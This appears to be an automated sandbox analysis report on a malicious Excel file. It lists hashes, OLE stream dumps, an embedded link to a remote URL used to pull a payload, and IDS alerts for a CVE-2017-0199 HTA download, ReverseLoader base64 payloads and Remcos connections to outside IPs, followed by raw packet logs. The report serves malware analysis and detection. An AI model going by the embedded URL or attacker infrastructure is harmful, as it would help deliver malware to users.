                                                                                                                                                                                Preview:..........o.e.c.L.L.i.L.W.W.N.i.W.j.e.L. .=. .".z.Z.Z.z.C.G.I.W.r.W.d.L.K.q.P.".....G.q.u.I.P.W.h.o.G.Z.h.P.i.L.P. .=. .".k.t.z.Z.q.x.K.z.A.G.g.N.b.B.L.".....c.g.p.j.P.P.N.h.K.u.q.e.L.k.t. .=. .".W.A.S.h.W.I.z.L.c.c.K.h.t.P.z.".....x.C.W.Z.q.o.L.i.k.s.P.m.G.i.q. .=. .".W.K.P.L.L.O.W.d.n.G.p.K.L.p.W.".....b.i.q.x.G.K.G.S.m.c.U.i.L.T.K. .=. .".G.W.c.K.L.L.n.n.k.N.A.G.t.h.A.".....P.i.l.h.e.W.R.A.c.K.L.L.H.k.p. .=. .".K.A.W.I.m.e.P.x.L.e.W.i.W.a.u.".........U.u.i.L.i.L.L.L.W.h.m.p.b.Z.j. .=. .".q.A.e.i.v.h.L.t.B.K.A.h.m.G.x.".....L.b.W.o.o.e.z.L.v.G.G.k.p.L.L. .=. .".d.K.a.K.W.u.u.z.L.o.z.f.c.l.e.".....P.p.G.f.z.i.z.Q.G.G.l.k.L.n.u. .=. .".f.i.W.p.Z.W.o.m.l.c.h.J.Q.x.c.".........W.q.p.L.J.L.n.W.h.Q.c.U.e.i.P. .=. .".i.H.h.f.k.W.G.N.W.i.L.W.z.P.i.".....d.W.z.c.h.u.R.Z.m.W.Z.W.W.l.A. .=. .".S.L.t.H.W.m.J.i.e.W.N.k.e.P.c.".....d.i.t.K.m.q.x.W.q.L.j.K.K.L.i. .=. .".L.d.I.K.G.p.o.k.L.q.h.c.o.j.m.".....L.W.q.P.H.q.b.t.n.e.s.W.g.h.f. .=. .".O.W.N.W.S.U.O.Z.A.W.W.K.S.m.G.".....l.u.K.o.n.t.P.J.P.e.
                                                                                                                                                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Nov 25 11:48:53 2024, Security: 1
                                                                                                                                                                                Entropy (8bit):7.826595061214578
                                                                                                                                                                                TrID:
                                                                                                                                                                                • Microsoft Excel sheet (30009/1) 47.99%
                                                                                                                                                                                • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                                                                                                                • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                                                                                                                File name:OC25-11-24.xls
                                                                                                                                                                                File size:204'800 bytes
                                                                                                                                                                                MD5:d923dc9f1abd640e545d1992bef70fb4
                                                                                                                                                                                SHA1:1c69fd2c258f80163dde3aa3b6e96ae9b4a42fa1
                                                                                                                                                                                SHA256:7f8c3780744584bc15d10cd35195cad98506691e51f75714f35a295e7d4ed638
                                                                                                                                                                                SHA512:041a9aa0a93d822e4cd10c02f2b0a6223881ee2f84d581fa548244312c80dee12a5b38354257ecbcf87493feb2f65c1e7b0ba8ce9756041018aae898a21c940b
                                                                                                                                                                                SSDEEP:3072:c1JTHBq6U/6xVsMKgpNc+ZwuURRTd9STL0bfC3LajCe7r7Ssb28HQiR:c1lHBMixiMK6G+ZFrTkC3LajCsfA8
                                                                                                                                                                                TLSH:17140224725BD526E6A714B10FD0C0DB7262FC019F065B5B78E8B74E1E7AE90CE22F46
                                                                                                                                                                                Icon Hash:276ea3a6a6b7bfbf
                                                                                                                                                                                Document Type:OLE
                                                                                                                                                                                Number of OLE Files:1
                                                                                                                                                                                Has Summary Info:
                                                                                                                                                                                Application Name:Microsoft Excel
                                                                                                                                                                                Encrypted Document:True
                                                                                                                                                                                Contains Word Document Stream:False
                                                                                                                                                                                Contains Workbook/Book Stream:True
                                                                                                                                                                                Contains PowerPoint Document Stream:False
                                                                                                                                                                                Contains Visio Document Stream:False
                                                                                                                                                                                Contains ObjectPool Stream:False
                                                                                                                                                                                Flash Objects Count:0
                                                                                                                                                                                Contains VBA Macros:True
                                                                                                                                                                                Code Page:1252
                                                                                                                                                                                Author:
                                                                                                                                                                                Last Saved By:
                                                                                                                                                                                Create Time:2006-09-16 00:00:00
                                                                                                                                                                                Last Saved Time:2024-11-25 11:48:53
                                                                                                                                                                                Creating Application:Microsoft Excel
                                                                                                                                                                                Security:1
                                                                                                                                                                                Document Code Page:1252
                                                                                                                                                                                Thumbnail Scaling Desired:False
                                                                                                                                                                                Contains Dirty Links:False
                                                                                                                                                                                Shared Document:False
                                                                                                                                                                                Changed Hyperlinks:False
                                                                                                                                                                                Application Version:786432
                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                                                                                                                VBA File Name:Sheet1.cls
                                                                                                                                                                                Stream Size:977
                                                                                                                                                                                Attribute VB_Name = "Sheet1"
                                                                                                                                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                                                Attribute VB_GlobalNameSpace = False
                                                                                                                                                                                Attribute VB_Creatable = False
                                                                                                                                                                                Attribute VB_PredeclaredId = True
                                                                                                                                                                                Attribute VB_Exposed = True
                                                                                                                                                                                Attribute VB_TemplateDerived = False
                                                                                                                                                                                Attribute VB_Customizable = True
                                                                                                                                                                                

                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                                                                                                                VBA File Name:Sheet2.cls
                                                                                                                                                                                Stream Size:977
                                                                                                                                                                                Attribute VB_Name = "Sheet2"
                                                                                                                                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                                                Attribute VB_GlobalNameSpace = False
                                                                                                                                                                                Attribute VB_Creatable = False
                                                                                                                                                                                Attribute VB_PredeclaredId = True
                                                                                                                                                                                Attribute VB_Exposed = True
                                                                                                                                                                                Attribute VB_TemplateDerived = False
                                                                                                                                                                                Attribute VB_Customizable = True
                                                                                                                                                                                

                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                                                                                                                                VBA File Name:Sheet3.cls
                                                                                                                                                                                Stream Size:977
                                                                                                                                                                                Attribute VB_Name = "Sheet3"
                                                                                                                                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                                                Attribute VB_GlobalNameSpace = False
                                                                                                                                                                                Attribute VB_Creatable = False
                                                                                                                                                                                Attribute VB_PredeclaredId = True
                                                                                                                                                                                Attribute VB_Exposed = True
                                                                                                                                                                                Attribute VB_TemplateDerived = False
                                                                                                                                                                                Attribute VB_Customizable = True
                                                                                                                                                                                

                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                                                                                                                VBA File Name:ThisWorkbook.cls
                                                                                                                                                                                Stream Size:985
                                                                                                                                                                                Attribute VB_Name = "ThisWorkbook"
                                                                                                                                                                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                                                                                                                Attribute VB_GlobalNameSpace = False
                                                                                                                                                                                Attribute VB_Creatable = False
                                                                                                                                                                                Attribute VB_PredeclaredId = True
                                                                                                                                                                                Attribute VB_Exposed = True
                                                                                                                                                                                Attribute VB_TemplateDerived = False
                                                                                                                                                                                Attribute VB_Customizable = True
                                                                                                                                                                                

                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:\x1CompObj
                                                                                                                                                                                CLSID:
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Stream Size:114
                                                                                                                                                                                Entropy:4.25248375192737
                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                CLSID:
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Stream Size:244
                                                                                                                                                                                Entropy:2.889430592781307
                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:\x5SummaryInformation
                                                                                                                                                                                CLSID:
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Stream Size:200
                                                                                                                                                                                Entropy:3.2341247550157988
                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:MBd00033107/\x1CompObj
                                                                                                                                                                                CLSID:
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Stream Size:99
                                                                                                                                                                                Entropy:3.631242196770981
                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                                                                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:MBd00033107/Package
                                                                                                                                                                                CLSID:
                                                                                                                                                                                File Type:Microsoft Excel 2007+
                                                                                                                                                                                Stream Size:123682
                                                                                                                                                                                Entropy:7.966670715574804
                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                Data ASCII:P K . . . . . . . . . . ! . . . . . & . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 b1 a6 ef bc 83 01 00 00 26 05 00 00 13 00 df 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 db 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:MBd00033108/\x1Ole
                                                                                                                                                                                CLSID:
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Stream Size:724
                                                                                                                                                                                Entropy:5.54422407510831
                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                Data ASCII:. . . . f k . h . . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . p . r . o . v . i . t . . . u . k . / . O . A . f . f . U . i . ? . & . c . h . a . i . r . l . i . f . t . = . b . u . s . y . & . c . o . c . k . p . i . t . = . b . l . u . s . h . i . n . g . & . p . r . e . c . i . p . i . t . a . t . i . o . n . = . h . o . n . o . r . a . b . l . e . & . s . k . i . l . l . = . q . u . i . z . z . i . c . a . l . & . t . i . m . e . o . u . t . . . 4 . f ! V . . D > U c
                                                                                                                                                                                Data Raw:01 00 00 02 af a5 66 6b df be 68 07 00 00 00 00 00 00 00 00 00 00 00 00 9c 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 98 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 70 00 72 00 6f 00 76 00 69 00 74 00 2e 00 75 00 6b 00 2f 00 4f 00 41 00 66 00 66 00 55 00 69 00 3f 00 26 00 63 00 68 00 61 00 69 00 72 00 6c 00 69 00 66 00 74 00 3d 00 62 00 75 00 73 00 79 00
                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:Workbook
                                                                                                                                                                                CLSID:
                                                                                                                                                                                File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                Stream Size:64679
                                                                                                                                                                                Entropy:7.983712136188715
                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . ) . . . % e h . . C F . Z @ . H Z Y E [ . g v j b H . D . . . . . . . . . . . \\ . p . F . . U ) * 9 . b E ' Z p . . 7 . . . & . K . e 9 ( z d . N I w - : ( e G . F i . h ` a R O S F . t . . U . . } B . . . ! t a . . . . . . . = . . . . . Y . . . q & . > Z . T * $ . . . . . . . . . } . . . . Z T . . . . % n . . . 5 . . . | = . . . . . { $ d . . % @ D . ; . @ . . . . . . . " . . . I . . . . . . . . . ^ . . . . 1 . . . M ( . . . n X J J 2 v P ( $ e 1 .
                                                                                                                                                                                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 b3 29 1a a1 15 05 f2 25 65 68 c2 93 0e 43 e0 ec 46 0e 5a e9 d0 40 18 48 8d 5a 59 a2 45 db 5b 80 e5 05 67 b1 76 6a 9c 62 f5 a1 48 85 f8 09 bd 44 e1 00 02 00 b0 04 c1 00 02 00 89 0d e2 00 00 00 5c 00 70 00 ba 9a 46 0e fc c3 e6 83 b5 8d 9d e2 c1 a0 55 29 d3 2a aa ab 39 15 62 e6 c6 45 c6 27 5a 70
                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                                                                                                                CLSID:
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Stream Size:523
                                                                                                                                                                                Entropy:5.238239839742505
                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                Data ASCII:I D = " { A 7 7 2 2 A D 3 - 3 7 F 1 - 4 8 D 7 - 8 C 9 A - E 3 9 1 F 0 F 3 2 C 4 8 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 8 A 8 8 6 C 0 E C 8 1 2 C 8 1 2 C
                                                                                                                                                                                Data Raw:49 44 3d 22 7b 41 37 37 32 32 41 44 33 2d 33 37 46 31 2d 34 38 44 37 2d 38 43 39 41 2d 45 33 39 31 46 30 46 33 32 43 34 38 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                                                                                                                CLSID:
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Stream Size:104
                                                                                                                                                                                Entropy:3.0488640812019017
                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                                                                                                                                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                                                                                                                CLSID:
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Stream Size:2644
                                                                                                                                                                                Entropy:3.9879678210198795
                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                                                                                                                                Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                                                                                                                                General
                                                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                                                                                                                CLSID:
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Stream Size:553
                                                                                                                                                                                Entropy:6.37016823888119
                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . O V i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                                                                                                                                                                                Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 4f ac 56 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-25T14:06:33.524346+0100 | 2057635 | ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound | 1 | 172.234.205.135 | 80 | 192.168.2.22 | 49177 | TCP
2024-11-25T14:06:33.524346+0100 | 2858295 | ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) | 1 | 172.234.205.135 | 80 | 192.168.2.22 | 49177 | TCP
2024-11-25T14:06:33.524346+0100 | 2057635 | ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound | 1 | 172.234.205.135 | 80 | 192.168.2.22 | 49173 | TCP
2024-11-25T14:06:33.524346+0100 | 2858295 | ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) | 1 | 172.234.205.135 | 80 | 192.168.2.22 | 49173 | TCP
2024-11-25T14:06:37.319515+0100 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49162 | 172.234.205.135 | 80 | TCP
2024-11-25T14:06:37.319565+0100 | 2024197 | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) | 1 | 172.234.205.135 | 80 | 192.168.2.22 | 49162 | TCP
2024-11-25T14:06:41.846744+0100 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49164 | 172.234.205.135 | 80 | TCP
2024-11-25T14:06:41.971767+0100 | 2024197 | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) | 1 | 172.234.205.135 | 80 | 192.168.2.22 | 49164 | TCP
2024-11-25T14:06:49.776281+0100 | 2858795 | ETPRO MALWARE ReverseLoader Payload Request (GET) M2 | 1 | 192.168.2.22 | 49165 | 172.234.205.135 | 80 | TCP
2024-11-25T14:07:02.412468+0100 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49171 | 172.234.205.135 | 80 | TCP
2024-11-25T14:07:05.115920+0100 | 2049038 | ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 | 1 | 193.30.119.205 | 443 | 192.168.2.22 | 49168 | TCP
2024-11-25T14:07:20.951958+0100 | 2049038 | ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 | 1 | 193.30.119.205 | 443 | 192.168.2.22 | 49172 | TCP
2024-11-25T14:07:21.342228+0100 | 2020424 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 | 1 | 172.234.205.135 | 80 | 192.168.2.22 | 49173 | TCP
2024-11-25T14:07:21.342228+0100 | 2020425 | ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 | 1 | 172.234.205.135 | 80 | 192.168.2.22 | 49173 | TCP
2024-11-25T14:07:24.964712+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49174 | 31.13.224.722412 | TCP
2024-11-25T14:07:27.766398+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49175 | 31.13.224.722412 | TCP
2024-11-25T14:07:28.439430+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.22 | 49176 | 178.237.33.50 | 80 | TCP
2024-11-25T14:07:35.806679+0100 | 2020424 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 | 1 | 172.234.205.135 | 80 | 192.168.2.22 | 49177 | TCP
2024-11-25T14:07:35.806679+0100 | 2020425 | ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 | 1 | 172.234.205.135 | 80 | 192.168.2.22 | 49177 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                Nov 25, 2024 14:06:37.319580078 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.319595098 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.319600105 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.319612026 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.319614887 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.319628000 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.319631100 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.319653034 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.319674969 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.340158939 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.439981937 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.440052032 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.440112114 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.440187931 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.444005966 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.444058895 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.537935972 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.537950039 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.538003922 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.540024042 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.540076971 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.540106058 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.540149927 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.548542976 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.548602104 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.548773050 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.548820972 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.556880951 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.556936026 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.557010889 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.557065010 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.565562010 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.565642118 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.566454887 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.566508055 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.574582100 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.574650049 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.574656010 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.574700117 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.582415104 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.582482100 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.582523108 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.582570076 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.590538025 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.590615034 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.590619087 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.590655088 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.598931074 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.598992109 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.599086046 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.599128962 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.607351065 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.607414961 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.607451916 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.607495070 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.615763903 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.615825891 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.615859985 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.615906000 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.624702930 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.624783039 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.749305010 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.749351978 CET8049162172.234.205.135192.168.2.22
